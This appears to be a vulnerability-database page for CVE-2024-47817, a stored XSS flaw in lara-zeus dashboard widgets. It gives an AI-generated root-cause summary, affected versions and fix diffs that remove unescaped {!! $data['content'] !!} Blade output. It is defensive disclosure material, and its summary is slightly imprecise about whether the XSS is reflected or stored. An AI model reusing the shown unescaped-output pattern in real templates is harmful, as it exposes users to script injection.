CVE-2024-47817
Description
Lara-zeus Dynamic Dashboard paragraph widget fails to sanitize user input, allowing stored XSS via crafted values.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Lara-zeus Dynamic Dashboard paragraph widget fails to sanitize user input, allowing stored XSS via crafted values.
Root
Cause
CVE-2024-47817 is a reflected or stored cross-site scripting (XSS) vulnerability in the Lara-zeus Dynamic Dashboard and Artemis theme packages. The paragraph widget directly outputs user-supplied content within a Blade template using {!! $data['content'] !!} without any sanitization [3][4]. This allows an attacker to inject arbitrary HTML and JavaScript by providing a value containing a specific set of characters.
Exploitation
An attacker with the ability to supply values to a paragraph widget—such as through widget configuration or a form that populates content—can include malicious script payloads. When a user views the page containing that widget, the payload executes in the context of the victim's browser. No special privileges beyond the ability to enter widget content are required; the attack can be used against any user visiting the affected page.
Impact
Successful exploitation could allow an attacker to steal session cookies, redirect the user to malicious sites, or perform actions on behalf of the victim within the Laravel application. The CVSS v3 base score is 6.1 (Medium), reflecting the need for user interaction and the scope of impact on confidentiality and integrity.
Mitigation
Patches have been released and are available in the referenced commits. The fix replaces the unsafe direct output with strip_tags() and then processes the content through Markdown, which escapes HTML tags. Users should upgrade to the patched versions of lara-zeus/dynamic-dashboard and lara-zeus/artemis as specified in the advisory. No workarounds are available [1].
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
lara-zeus/dynamic-dashboardPackagist | >= 3.0.0, < 3.0.2 | 3.0.2 |
lara-zeus/artemisPackagist | >= 1.0.0, < 1.0.7 | 1.0.7 |
Affected products
3- ghsa-coords2 versions
>= 1.0.0, < 1.0.7+ 1 more
- (no CPE)range: >= 1.0.0, < 1.0.7
- (no CPE)range: >= 3.0.0, < 3.0.2
Patches
33 files changed · +24 −6
resources/views/themes/another-portfolio/rain/widgets/HeadingWidget.blade.php+8 −2 modified@@ -1,3 +1,9 @@ -<div class="py-4"> - {!! $data['content'] !!} +<div class="max-w-none p-4 prose lg:prose-xl prose-primary dark:prose-invert"> + {!! + (new \Illuminate\Support\HtmlString( + str(strip_tags($data['content'])) + ->markdown() + )) + ->toHtml() + !!} </div>
resources/views/themes/breeze/rain/widgets/HeadingWidget.blade.php+8 −2 modified@@ -1,3 +1,9 @@ -<div class="py-4"> - {!! $data['content'] !!} +<div class="max-w-none p-4 prose lg:prose-xl prose-primary dark:prose-invert"> + {!! + (new \Illuminate\Support\HtmlString( + str(strip_tags($data['content'])) + ->markdown() + )) + ->toHtml() + !!} </div>
resources/views/themes/daisy/rain/widgets/HeadingWidget.blade.php+8 −2 modified@@ -1,3 +1,9 @@ -<div class="py-4"> - {!! $data['content'] !!} +<div class="max-w-none p-4 prose lg:prose-xl prose-primary dark:prose-invert"> + {!! + (new \Illuminate\Support\HtmlString( + str(strip_tags($data['content'])) + ->markdown() + )) + ->toHtml() + !!} </div>
adfb4b1cdfdaMerge pull request #42 from lara-zeus/hot-fix
4 files changed · +69 −8
docs/assets.md+55 −0 added@@ -0,0 +1,55 @@ +--- +title: Themes and Assets +weight: 6 +--- + +## Compiling assets + +we use [tailwind Css](https://tailwindcss.com/) and custom themes by filament, make sure you are familiar with [tailwindcss configuration](https://tailwindcss.com/docs/configuration), and how to make custom [filament theme](https://filamentphp.com/docs/2.x/admin/appearance#building-themes). + +### Custom Classes: + +You need to add these files to your `tailwind.config.js` file in the `content` section. + +* frontend: + +```js +content: [ + //... + './vendor/lara-zeus/dynamic-dashboard/resources/views/themes/**/*.blade.php', + './vendor/lara-zeus/dynamic-dashboard/src/Models/Columns.php', +] +``` + +* filament: + +```js +content: [ + //... + './vendor/lara-zeus/rain/resources/views/filament/**/*.blade.php', + './vendor/lara-zeus/rain/src/Models/Columns.php', +] +``` + +### Customizing the Frontend Views + +first, publish the config file: + +```php +php artisan vendor:publish --tag=zeus-config +``` + +then change the default layout in the file `zeus.php`: + +```php +'layout' => 'components.layouts.app', +// this is assuming your layout on the folder `resources/views/components/layouts/app` +``` +this will give you full control for the assets files and the header and the footer. + + +If needed, you can publish the blade views for all zeus packages: + +```php +php artisan vendor:publish --tag=zeus-views +```
.github/workflows/phpstan.yml+1 −1 modified@@ -16,7 +16,7 @@ jobs: - name: Setup PHP uses: shivammathur/setup-php@v2 with: - php-version: '8.1' + php-version: '8.2' coverage: none - name: Install composer dependencies
.github/workflows/run-tests.yml+6 −6 modified@@ -13,12 +13,12 @@ jobs: fail-fast: true matrix: os: [ubuntu-latest, windows-latest] - php: [8.1] - laravel: [9.*] - stability: [prefer-lowest, prefer-stable] + php: [8.2] + laravel: [10.*] + stability: [prefer-stable] include: - - laravel: 9.* - testbench: 7.* + - laravel: 10.* + testbench: 8.* name: P${{ matrix.php }} - L${{ matrix.laravel }} - ${{ matrix.stability }} - ${{ matrix.os }} @@ -44,4 +44,4 @@ jobs: composer update --${{ matrix.stability }} --prefer-dist --no-interaction - name: Execute tests - run: vendor/bin/pest + run: vendor/bin/pest \ No newline at end of file
resources/views/themes/zeus/dynamic-dashboard/widgets/HeadingWidget.blade.php+7 −1 modified@@ -1,3 +1,9 @@ <div class="max-w-none p-4 prose lg:prose-xl prose-primary dark:prose-invert"> - {!! str($data['content'])->markdown() !!} + {!! + (new \Illuminate\Support\HtmlString( + str(strip_tags($data['content'])) + ->markdown() + )) + ->toHtml() + !!} </div>
4636f58628d2Merge pull request #23 from lara-zeus/fix-blade
3 files changed · +24 −6
resources/views/themes/another-portfolio/rain/widgets/HeadingWidget.blade.php+8 −2 modified@@ -1,3 +1,9 @@ -<div class="py-4"> - {!! $data['content'] !!} +<div class="max-w-none p-4 prose lg:prose-xl prose-primary dark:prose-invert"> + {!! + (new \Illuminate\Support\HtmlString( + str(strip_tags($data['content'])) + ->markdown() + )) + ->toHtml() + !!} </div>
resources/views/themes/breeze/rain/widgets/HeadingWidget.blade.php+8 −2 modified@@ -1,3 +1,9 @@ -<div class="py-4"> - {!! $data['content'] !!} +<div class="max-w-none p-4 prose lg:prose-xl prose-primary dark:prose-invert"> + {!! + (new \Illuminate\Support\HtmlString( + str(strip_tags($data['content'])) + ->markdown() + )) + ->toHtml() + !!} </div>
resources/views/themes/daisy/rain/widgets/HeadingWidget.blade.php+8 −2 modified@@ -1,3 +1,9 @@ -<div class="py-4"> - {!! $data['content'] !!} +<div class="max-w-none p-4 prose lg:prose-xl prose-primary dark:prose-invert"> + {!! + (new \Illuminate\Support\HtmlString( + str(strip_tags($data['content'])) + ->markdown() + )) + ->toHtml() + !!} </div>
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
6- github.com/advisories/GHSA-c6cw-g7fc-4gwcghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2024-47817ghsaADVISORY
- github.com/lara-zeus/artemis/commit/3a3f9dd8a706af569c5581b20dcfeff91a43b9d9nvdWEB
- github.com/lara-zeus/artemis/commit/4636f58628d20d3e78ea8514406bd7da94997f2cghsaWEB
- github.com/lara-zeus/dynamic-dashboard/commit/adfb4b1cdfdaa01299631f0e569ce201a7cc545anvdWEB
- github.com/lara-zeus/dynamic-dashboard/security/advisories/GHSA-c6cw-g7fc-4gwcnvdWEB
News mentions
0No linked articles in our index yet.